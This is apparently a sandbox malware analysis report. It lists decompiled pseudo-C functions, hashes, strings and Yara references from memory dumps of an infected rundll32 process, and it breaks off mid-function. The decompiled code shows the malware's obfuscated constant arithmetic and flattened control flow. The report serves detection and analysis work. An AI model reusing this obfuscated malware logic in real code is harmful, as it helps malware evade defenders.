Instruction ID: 545ad079a7ef9315715391c513d29b0357cf124b2ba5150f777f4143a25d9c99
Opcode Fuzzy Hash: a10795b6ba630564cfe3395ff1ad3698fc1408f8188cf891101de7ef4f20ca89
Instruction Fuzzy Hash: 5B51AF7190C3419BC358DF25D48A45BFBE0BBC8758F501A1DF4D9662A1C3B49A19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 002A6D34, Relevance: 5.1, Strings: 4, Instructions: 142COMMON

Download Yara Rule

Strings

P:k7, xrefs: 002A6EE1
1$, xrefs: 002A6E99
In, xrefs: 002A6E91
pU, xrefs: 002A6D58

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$$In$P:k7$pU
API String ID: 0-2106264963
Opcode ID: d1d7bf6da6791866804745d035a0d8a80442bdbeb99985a193c9e9644f507bf8
Instruction ID: 757d541d42f594a517858269ce980796432c282a9a9e7291b428a8ade6ae4e43
Opcode Fuzzy Hash: d1d7bf6da6791866804745d035a0d8a80442bdbeb99985a193c9e9644f507bf8
Instruction Fuzzy Hash: D851BD715183419FD358DF21D48A45BFBE0BBC8348F540A1DF9DAAA260C7B4CA19CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0020DEE8, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0020DEE8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				void* _t134;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t134);
				_v56 = _v56 & 0x00000000;
				_v60 = 0x429fa3;
				_v16 = 0x8df8;
				_v16 = _v16 | 0x5bad6fdd;
				_v16 = _v16 ^ 0x1c317be5;
				_v16 = _v16 ^ 0x479cc3d4;
				_v12 = 0xa64d;
				_t151 = 0x35;
				_v12 = _v12 / _t151;
				_v12 = _v12 + 0xfffff8cf;
				_v12 = _v12 | 0x0b89d292;
				_v12 = _v12 ^ 0xffff912a;
				_v8 = 0x343c;
				_v8 = _v8 + 0xdfbd;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x831c11fe;
				_v8 = _v8 ^ 0x831c1bf9;
				_v20 = 0xd2ea;
				_v20 = _v20 << 0xb;
				_v20 = _v20 + 0xffff01f9;
				_t152 = 0x3f;
				_v20 = _v20 / _t152;
				_v20 = _v20 ^ 0x001a8b92;
				_v52 = 0xabad;
				_v52 = _v52 ^ 0xf345eb5d;
				_v52 = _v52 ^ 0xf3453027;
				_v40 = 0x2a5b;
				_v40 = _v40 ^ 0x8a944271;
				_v40 = _v40 + 0xffff3ddd;
				_v40 = _v40 ^ 0x8a93ae26;
				_v36 = 0xa033;
				_t153 = 0x2a;
				_v36 = _v36 / _t153;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000061ee;
				_v32 = 0x8be0;
				_v32 = _v32 | 0xe631180e;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x19bef193;
				_v48 = 0xa7b3;
				_t154 = 0x44;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0xb8c85214;
				_v28 = 0x762;
				_v28 = _v28 | 0x9c151205;
				_v28 = _v28 << 8;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0015065a;
				_v44 = 0x58a5;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00007339;
				_v24 = 0xfaea;
				_v24 = _v24 << 3;
				_v24 = _v24 + 0xd2b0;
				_t155 = 3;
				_push(0x1f15c0);
				_v24 = _v24 / _t155;
				_v24 = _v24 ^ 0x00028589;
				_push(_v8);
				E002063BF(E0020BF25(_v16, _v12, _v24), _v24, _v52, _v40, __edx, _v16, _v36, _a12, _a8, _v32);
				return E0020C5F7(_v48, _v28, _v44, _v24, _t147);
			}

0x0020def0
0x0020def5
0x0020def8
0x0020defb
0x0020defe
0x0020deff
0x0020df00
0x0020df05
0x0020df0b
0x0020df12
0x0020df19
0x0020df20
0x0020df27
0x0020df2e
0x0020df3a
0x0020df3f
0x0020df44
0x0020df4b
0x0020df52
0x0020df59
0x0020df60
0x0020df67
0x0020df6b
0x0020df72
0x0020df79
0x0020df80
0x0020df84
0x0020df8e
0x0020df93
0x0020df98
0x0020df9f
0x0020dfa6
0x0020dfad
0x0020dfb4
0x0020dfbb
0x0020dfc2
0x0020dfc9
0x0020dfd0
0x0020dfda
0x0020dfdf
0x0020dfe4
0x0020dfe8
0x0020dfef
0x0020dff6
0x0020dffd
0x0020e001
0x0020e008
0x0020e013
0x0020e014
0x0020e017
0x0020e01b
0x0020e022
0x0020e029
0x0020e030
0x0020e034
0x0020e038
0x0020e03f
0x0020e046
0x0020e04f
0x0020e052
0x0020e059
0x0020e060
0x0020e066
0x0020e072
0x0020e075
0x0020e07a
0x0020e07d
0x0020e084
0x0020e0b0
0x0020e0cf

Strings

a, xrefs: 0020DFE8
9s, xrefs: 0020E052
<4, xrefs: 0020DF59
[*, xrefs: 0020DFB4

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9s$<4$[*$a
API String ID: 0-239331953
Opcode ID: ce58b433f98051d7f48faf51f54d0fa306723f0a35f146910d38bd0f0edc237e
Instruction ID: 4918616f0bbf58901cb2b12112faae5d4442a5038e71990d30b500734e6846d0
Opcode Fuzzy Hash: ce58b433f98051d7f48faf51f54d0fa306723f0a35f146910d38bd0f0edc237e
Instruction Fuzzy Hash: 73511571D00219EBDF08CFE5D94A4EEBBB2FB48314F208119E521762A0D7B51A65CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002AD45C, Relevance: 5.1, Strings: 4, Instructions: 123COMMON

Download Yara Rule

Strings

[*, xrefs: 002AD528
a, xrefs: 002AD55C
9s, xrefs: 002AD5C6
<4, xrefs: 002AD4CD

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9s$<4$[*$a
API String ID: 0-239331953
Opcode ID: e39562f1a81d4d1510203f867bde84f6e7fb71415a0a889ef4ebe2e0f83f2b0b
Instruction ID: 0e12f2f1da450085dc4b50d57f5efcb2454acdfa229e7f34436f86af68ef2611
Opcode Fuzzy Hash: e39562f1a81d4d1510203f867bde84f6e7fb71415a0a889ef4ebe2e0f83f2b0b
Instruction Fuzzy Hash: F9513571D00219EFDF08CFE5D94A8DEBBB2FB48314F208119E521B6260D7B50A65CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0029C485, Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

"d, xrefs: 0029C540
K\n, xrefs: 0029C573
K\n, xrefs: 0029C4C1
e, xrefs: 0029C4D0

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "d$K\n$K\n$e
API String ID: 0-2295333183
Opcode ID: 7c8255c31bcaa2eee5c4b97f112b2b1edc58bab5b7cacdcb6d71723d0e853809
Instruction ID: 2e845de7f87854e5d4ff88e97f6a04941299b4f8824398a2b6e912f98183a770
Opcode Fuzzy Hash: 7c8255c31bcaa2eee5c4b97f112b2b1edc58bab5b7cacdcb6d71723d0e853809
Instruction Fuzzy Hash: 13310576D0020CFBDF05CFE6C8898DEBBB1FB48304F108199E918A6250D3B59A25DF80

Uniqueness

Uniqueness Score: -1.00%

Function 002099A4, Relevance: 4.0, Strings: 3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E002099A4() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t279;
				short _t282;
				void* _t290;
				void* _t291;
				void* _t315;
				short* _t316;
				void* _t317;
				short* _t318;
				short* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;

				_v88 = 0x9528;
				_t315 =  *0x2121b0 + 0x10;
				_v88 = _v88 << 0x10;
				_t291 = 0x29b6ea94;
				_v88 = _v88 ^ 0x95285eaa;
				_v84 = 0xe890;
				_t320 = 0x34;
				_v84 = _v84 * 0x1f;
				_v84 = _v84 ^ 0x001c45a3;
				_v28 = 0x9112;
				_v28 = _v28 / _t320;
				_t321 = 0x19;
				_v28 = _v28 * 0x31;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x088a98e7;
				_v52 = 0xda31;
				_v52 = _v52 >> 8;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x000066fb;
				_v24 = 0xe82b;
				_v24 = _v24 ^ 0xb4fe6801;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 | 0xa81c026a;
				_v24 = _v24 ^ 0xa83d3e65;
				_v20 = 0x6909;
				_v20 = _v20 + 0xffffc42e;
				_v20 = _v20 << 0xd;
				_v20 = _v20 / _t321;
				_v20 = _v20 ^ 0x0039e32c;
				_v60 = 0xab82;
				_v60 = _v60 + 0xffff0bd3;
				_t322 = 0xf;
				_v60 = _v60 * 0x76;
				_v60 = _v60 ^ 0xffdec8c4;
				_v56 = 0x5e59;
				_v56 = _v56 / _t322;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x00001434;
				_v96 = 0x977a;
				_t323 = 0x6f;
				_v96 = _v96 * 0x61;
				_v96 = _v96 ^ 0x00397eb3;
				_v92 = 0xa291;
				_v92 = _v92 | 0x42e1adc5;
				_v92 = _v92 ^ 0x42e1b77e;
				_v40 = 0x73d4;
				_v40 = _v40 / _t323;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x4a;
				_v40 = _v40 ^ 0x0000cc60;
				_v36 = 0x33bd;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0xc340ad00;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x0564fa7a;
				_v64 = 0xc60;
				_v64 = _v64 | 0x04416794;
				_t324 = 0x5f;
				_v64 = _v64 * 0xd;
				_v64 = _v64 ^ 0x3752d4dc;
				_v32 = 0xae9f;
				_v32 = _v32 + 0x24a;
				_v32 = _v32 + 0xffffd123;
				_t325 = 0x3d;
				_v32 = _v32 / _t324;
				_v32 = _v32 ^ 0x0000400c;
				_v72 = 0x4f8e;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x027c6373;
				_v12 = 0x21f4;
				_v12 = _v12 + 0x1717;
				_v12 = _v12 * 0x19;
				_v12 = _v12 + 0xffff4c52;
				_v12 = _v12 ^ 0x00049658;
				_v8 = 0xd7dc;
				_v8 = _v8 ^ 0x4ae28678;
				_v8 = _v8 * 0x67;
				_v8 = _v8 + 0xffff8b2b;
				_v8 = _v8 ^ 0x210e6813;
				_v44 = 0x10ca;
				_v44 = _v44 * 0xe;
				_v44 = _v44 ^ 0x21d1d5f5;
				_v44 = _v44 ^ 0x21d123f7;
				_v48 = 0xfc7c;
				_v48 = _v48 ^ 0x12e29e7b;
				_v48 = _v48 ^ 0x780ab142;
				_v48 = _v48 ^ 0x6ae8c2ee;
				_v80 = 0x56f;
				_t326 = 0x77;
				_v80 = _v80 / _t325;
				_v80 = _v80 ^ 0x0000686a;
				_v16 = 0x940a;
				_v16 = _v16 ^ 0x3241511d;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0x2c0ae0b9;
				_v16 = _v16 ^ 0xed0fff5b;
				_v76 = 0xb74;
				_v76 = _v76 | 0xff1ac2c7;
				_v76 = _v76 ^ 0xff1aa207;
				_v108 = 0xf16f;
				_v108 = _v108 + 0xffff55fa;
				_v108 = _v108 ^ 0x00000b68;
				_v104 = 0x7f0f;
				_v104 = _v104 / _t326;
				_v104 = _v104 ^ 0x00004c16;
				_v68 = 0xc425;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0xc23afe3b;
				_v68 = _v68 ^ 0xe23ab7b9;
				_v100 = 0xccd6;
				_v100 = _v100 | 0x04b2265a;
				_v100 = _v100 ^ 0x04b29fa8;
				_t290 = 2;
				do {
					while(_t291 != 0x2226ace9) {
						if(_t291 == 0x2622bc84) {
							_push(_t291);
							_t327 = E001F607F(_t291, __eflags, _t291, 0x10, 4);
							E001FD940(_t315, _v56, _v96, _v92, _t290,  &_v112, 1);
							_t317 = _t315 + _t290;
							E001FD940(_t317, _v36, _v64, _v32, 1,  &_v112, _t327);
							_t329 = _t329 + 0x40;
							_t318 = _t317 + _t327 * 2;
							_t291 = 0x29e4095b;
							_t279 = 0x5c;
							 *_t318 = _t279;
							_t315 = _t318 + _t290;
							continue;
						} else {
							if(_t291 == 0x29b6ea94) {
								_t282 = E00207B6B();
								_v112 = _t282;
								_t291 = 0x2622bc84;
								continue;
							} else {
								_t334 = _t291 - 0x29e4095b;
								if(_t291 == 0x29e4095b) {
									_push(_t291);
									_t328 = E001F607F(_t291, _t334, _t291, 0x10, 4);
									E001FD940(_t315, _v80, _v16, _v76, 1,  &_v112, _t328);
									_t329 = _t329 + 0x28;
									_t319 = _t315 + _t328 * 2;
									_t291 = 0x2226ace9;
									_t282 = 0x2e;
									 *_t319 = _t282;
									_t315 = _t319 + _t290;
									continue;
								}
							}
						}
						goto L9;
					}
					E001FD940(_t315, _v104, _v68, _v100, 1,  &_v112, 3);
					_t316 = _t315 + 6;
					_t329 = _t329 + 0x18;
					_t291 = 0x2b0037fd;
					 *_t316 = 0;
					_t315 = _t316 + _t290;
					__eflags = _t315;
					L9:
					__eflags = _t291 - 0x2b0037fd;
				} while (__eflags != 0);
				return _t282;
			}

0x002099b5
0x002099bc
0x002099bf
0x002099c3
0x002099c8
0x002099cf
0x002099dc
0x002099df
0x002099e2
0x002099e9
0x002099f7
0x002099fe
0x00209a01
0x00209a04
0x00209a08
0x00209a0f
0x00209a16
0x00209a1a
0x00209a1e
0x00209a25
0x00209a2c
0x00209a33
0x00209a37
0x00209a3e
0x00209a45
0x00209a4c
0x00209a53
0x00209a5e
0x00209a61
0x00209a68
0x00209a6f
0x00209a7a
0x00209a7d
0x00209a80
0x00209a87
0x00209a95
0x00209a98
0x00209a9c
0x00209aa3
0x00209aae
0x00209aaf
0x00209ab2
0x00209ab9
0x00209ac0
0x00209ac7
0x00209ace
0x00209ada
0x00209add
0x00209ae4
0x00209ae7
0x00209aee
0x00209af5
0x00209af9
0x00209b00
0x00209b04
0x00209b0b
0x00209b12
0x00209b21
0x00209b24
0x00209b27
0x00209b2e
0x00209b35
0x00209b3c
0x00209b48
0x00209b49
0x00209b4e
0x00209b55
0x00209b5c
0x00209b60
0x00209b67
0x00209b6e
0x00209b7b
0x00209b7e
0x00209b85
0x00209b8c
0x00209b93
0x00209b9e
0x00209ba1
0x00209ba8
0x00209baf
0x00209bba
0x00209bbd
0x00209bc4
0x00209bcb
0x00209bd2
0x00209bd9
0x00209be0
0x00209be7
0x00209bf3
0x00209bf4
0x00209bf9
0x00209c00
0x00209c07
0x00209c0e
0x00209c12
0x00209c19
0x00209c20
0x00209c27
0x00209c2e
0x00209c35
0x00209c3c
0x00209c43
0x00209c4a
0x00209c58
0x00209c5b
0x00209c62
0x00209c69
0x00209c6d
0x00209c74
0x00209c7b
0x00209c82
0x00209c89
0x00209c90
0x00209c91
0x00209c91
0x00209ca3
0x00209d25
0x00209d32
0x00209d47
0x00209d50
0x00209d63
0x00209d68
0x00209d6b
0x00209d6e
0x00209d75
0x00209d76
0x00209d79
0x00000000
0x00209ca5
0x00209cab
0x00209d07
0x00209d0c
0x00209d0f
0x00000000
0x00209cad
0x00209cad
0x00209cb3
0x00209cc5
0x00209cd0
0x00209ce7
0x00209cec
0x00209cef
0x00209cf2
0x00209cf9
0x00209cfa
0x00209cfd
0x00000000
0x00209cfd
0x00209cb3
0x00209cab
0x00000000
0x00209ca3
0x00209d96
0x00209d9b
0x00209da0
0x00209da3
0x00209da8
0x00209dab
0x00209dab
0x00209dad
0x00209dad
0x00209dad
0x00209dbf

Strings

[), xrefs: 00209CAD
[), xrefs: 00209D6E
,9, xrefs: 00209A61

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,9$[)$[)
API String ID: 0-3362820381
Opcode ID: 948f0ed16e08b4dd161d2a43f31a4c385309d96369d22805a2690e3b7d896b25
Instruction ID: 75ee24702d6c5cbf4570140da51da63ef47244189dc3b6f081eec08fd2fe2166
Opcode Fuzzy Hash: 948f0ed16e08b4dd161d2a43f31a4c385309d96369d22805a2690e3b7d896b25
Instruction Fuzzy Hash: D2C11571D01309DBEB18CFE5D98A9EEBBB6FB44314F208119E116BB2A5C7B91A45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002A8F18, Relevance: 4.0, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

[), xrefs: 002A92E2
,9, xrefs: 002A8FD5
[), xrefs: 002A9221

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,9$[)$[)
API String ID: 0-3362820381
Opcode ID: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction ID: 323af76cc2ee54b8b2ef8b88ac2a7051f6762933535fe3d1f25ba402cd67ad34
Opcode Fuzzy Hash: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction Fuzzy Hash: 8FC11471D01309EBEF18CFE5D98AADEBBB6FB44304F208119E116BA2A4C7B51A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001FD0DE, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001FD0DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t144;
				signed int _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				void* _t170;
				signed int* _t173;

				_push(_a16);
				_t169 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t133);
				_v48 = 0x5a8b;
				_t173 =  &(( &_v60)[6]);
				_v48 = _v48 ^ 0x4360b52a;
				_v48 = _v48 ^ 0x1a806351;
				_t170 = 0;
				_v48 = _v48 >> 2;
				_t157 = 0x13068ceb;
				_v48 = _v48 ^ 0x1678233d;
				_v8 = 0x8630;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00000862;
				_v52 = 0x326b;
				_v52 = _v52 >> 1;
				_v52 = _v52 | 0xc7f7cfdb;
				_v52 = _v52 ^ 0x87f7dfff;
				_v12 = 0x4e1;
				_v12 = _v12 | 0x6d92ca4a;
				_v12 = _v12 ^ 0x2d92ceeb;
				_v28 = 0xfb25;
				_v28 = _v28 | 0x71bf14c1;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xbfffdb80;
				_v32 = 0xf237;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000074ee;
				_v36 = 0xcd16;
				_t153 = 0x3c;
				_v36 = _v36 * 0x44;
				_v36 = _v36 ^ 0x3fdc784b;
				_v36 = _v36 ^ 0x3fea737c;
				_v20 = 0xb3fe;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00007694;
				_v56 = 0xdd00;
				_v56 = _v56 * 0x23;
				_v56 = _v56 + 0xffff9337;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0ee528fc;
				_v60 = 0xf711;
				_v60 = _v60 >> 4;
				_v60 = _v60 | 0x4989a590;
				_v60 = _v60 + 0xffff6a05;
				_v60 = _v60 ^ 0x49891a0f;
				_v40 = 0x92cf;
				_v40 = _v40 ^ 0xf586a06e;
				_v40 = _v40 + 0xffff6eef;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0xb4326dcb;
				_v44 = 0x65dd;
				_v44 = _v44 / _t153;
				_v44 = _v44 << 6;
				_v44 = _v44 + 0xffff872c;
				_v44 = _v44 ^ 0xffffb82a;
				_v16 = 0xf090;
				_t154 = 0x21;
				_v16 = _v16 / _t154;
				_v16 = _v16 ^ 0x00005a72;
				_v24 = 0xb1df;
				_v24 = _v24 * 6;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x08564d31;
				while(_t157 != 0x13068ceb) {
					if(_t157 == 0x32a00bf2) {
						_t144 = E0020551E(_a16,  &_v4, _v28, _t169, 0, _v52 | _v48, _v32, _v36, _v20);
						_t173 =  &(_t173[7]);
						if(_t144 != 0) {
							_t157 = 0x39bb1850;
							continue;
						}
					} else {
						if(_t157 == 0x367d931e) {
							E0020551E(_a16,  &_v4, _v40, _t169, _t170, _v12 | _v8, _v44, _v16, _v24);
						} else {
							if(_t157 != 0x39bb1850) {
								L10:
								if(_t157 != 0x1d94fa77) {
									continue;
								} else {
								}
							} else {
								_push(_t157);
								_t170 = E002057E8(_v4 + _v4);
								if(_t170 != 0) {
									_t157 = 0x367d931e;
									continue;
								}
							}
						}
					}
					return _t170;
				}
				_t157 = 0x32a00bf2;
				goto L10;
			}

0x001fd0e5
0x001fd0e9
0x001fd0eb
0x001fd0ef
0x001fd0f3
0x001fd0f7
0x001fd0f8
0x001fd0f9
0x001fd0fe
0x001fd106
0x001fd109
0x001fd113
0x001fd11b
0x001fd11d
0x001fd122
0x001fd127
0x001fd12f
0x001fd137
0x001fd13c
0x001fd144
0x001fd14c
0x001fd150
0x001fd158
0x001fd160
0x001fd168
0x001fd170
0x001fd178
0x001fd180
0x001fd188
0x001fd18d
0x001fd195
0x001fd19d
0x001fd1a2
0x001fd1a7
0x001fd1af
0x001fd1be
0x001fd1c1
0x001fd1c5
0x001fd1cd
0x001fd1d5
0x001fd1dd
0x001fd1e2
0x001fd1ea
0x001fd1f7
0x001fd1fb
0x001fd203
0x001fd208
0x001fd210
0x001fd218
0x001fd21d
0x001fd225
0x001fd22d
0x001fd235
0x001fd23d
0x001fd245
0x001fd24d
0x001fd252
0x001fd25a
0x001fd26a
0x001fd26e
0x001fd273
0x001fd27b
0x001fd283
0x001fd28f
0x001fd292
0x001fd296
0x001fd29e
0x001fd2b5
0x001fd2b9
0x001fd2be
0x001fd2c6
0x001fd2d0
0x001fd322
0x001fd327
0x001fd32c
0x001fd32e
0x00000000
0x001fd32e
0x001fd2d2
0x001fd2d4
0x001fd364
0x001fd2d6
0x001fd2dc
0x001fd337
0x001fd33d
0x00000000
0x00000000
0x001fd33f
0x001fd2de
0x001fd2ea
0x001fd2f3
0x001fd2f8
0x001fd2fa
0x00000000
0x001fd2fa
0x001fd2f8
0x001fd2dc
0x001fd2d4
0x001fd375
0x001fd375
0x001fd335
0x00000000

Strings

k2, xrefs: 001FD144
rZ, xrefs: 001FD296
|s?, xrefs: 001FD1CD

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k2$rZ$|s?
API String ID: 0-1348797666
Opcode ID: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction ID: ab4e6ac55056c26a4215cb723917fc63246d3c8352c18b7db8619bbaf9e0fc92
Opcode Fuzzy Hash: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction Fuzzy Hash: 1B611FB1109341AFC359CF25C88982FBBE1BB98758F50490CF69696261D3B1CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0029C652, Relevance: 3.9, Strings: 3, Instructions: 149COMMON

Download Yara Rule

Strings

rZ, xrefs: 0029C80A
|s?, xrefs: 0029C741
k2, xrefs: 0029C6B8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k2$rZ$|s?
API String ID: 0-1348797666
Opcode ID: 7bfb30cdcc0994ef3478734543574ca565bfece88b55316390611edb13215ba6
Instruction ID: cdcc99b1aa6604bf9cb1659c7eb4c6e528bc1e962a76f77a7167b1d17c825c58
Opcode Fuzzy Hash: 7bfb30cdcc0994ef3478734543574ca565bfece88b55316390611edb13215ba6
Instruction Fuzzy Hash: 79612F71109342AFC759CF25C88981BBBE0BBD8748F50591CF59696261D3B1CA19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0020DB25, Relevance: 3.9, Strings: 3, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0020DB25(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t118;
				void* _t135;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t144;
				void* _t163;
				signed int* _t166;

				_push(_a16);
				_t162 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t118);
				_v96 = 0x6541;
				_t166 =  &(( &_v96)[6]);
				_v96 = _v96 ^ 0x91bfb37d;
				_v96 = _v96 >> 0x10;
				_t163 = 0;
				_v96 = _v96 << 0xe;
				_t144 = 0xd16dbf6;
				_v96 = _v96 ^ 0x246feaa2;
				_v80 = 0xafef;
				_v80 = _v80 + 0xd5f0;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000020f9;
				_v60 = 0x3fa;
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0x0003a875;
				_v68 = 0xdac3;
				_v68 = _v68 >> 4;
				_t138 = 0x79;
				_v68 = _v68 * 0x37;
				_v68 = _v68 ^ 0x0002ab2a;
				_v56 = 0xacb2;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x00056a81;
				_v72 = 0x451e;
				_v72 = _v72 << 0xa;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x008a68a2;
				_v76 = 0xa9b5;
				_v76 = _v76 ^ 0x71c268bb;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x000e50b8;
				_v84 = 0x733c;
				_v84 = _v84 + 0xffff2d0a;
				_v84 = _v84 | 0xc6f06430;
				_v84 = _v84 + 0xffffe838;
				_v84 = _v84 ^ 0xffffb7ce;
				_v88 = 0xd1fe;
				_v88 = _v88 / _t138;
				_v88 = _v88 | 0xc6561511;
				_t139 = 0x35;
				_v88 = _v88 / _t139;
				_v88 = _v88 ^ 0x03be11ae;
				_v64 = 0xb503;
				_v64 = _v64 ^ 0x4b2bbc6a;
				_v64 = _v64 + 0xffffbb02;
				_v64 = _v64 ^ 0x4b2ab619;
				_v92 = 0x25d2;
				_t140 = 0x57;
				_v92 = _v92 * 0x42;
				_v92 = _v92 / _t140;
				_t141 = 0x2f;
				_v92 = _v92 / _t141;
				_v92 = _v92 ^ 0x00006e4e;
				do {
					while(_t144 != 0xd16dbf6) {
						if(_t144 == 0x14ed0f49) {
